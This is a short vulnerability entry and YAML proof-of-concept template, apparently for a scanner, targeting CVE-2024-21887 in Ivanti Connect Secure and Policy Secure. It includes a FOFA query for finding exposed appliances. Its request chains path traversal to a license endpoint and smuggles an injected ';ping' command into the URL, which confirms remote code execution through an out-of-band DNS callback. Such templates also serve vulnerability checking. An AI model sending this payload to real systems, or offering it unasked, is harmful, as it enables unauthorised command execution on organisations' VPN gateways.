A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
fofa: body="welcome.cgi?p=logo"
PoC代码[已公开]
id: CVE-2024-21887
info:
name: Ivanti Connect Secure 远程命令注入
author: zan8in
severity: critical
verified: true
description: |-
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
fofa: body="welcome.cgi?p=logo"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-21887
tags: ivanti,rce,cve,cve2024
created: 2024/02/01
set:
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: GET
path: /api/v1/totp/user-backup-code/../../license/keys-status/%3bping%20{{oobDNS}}
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()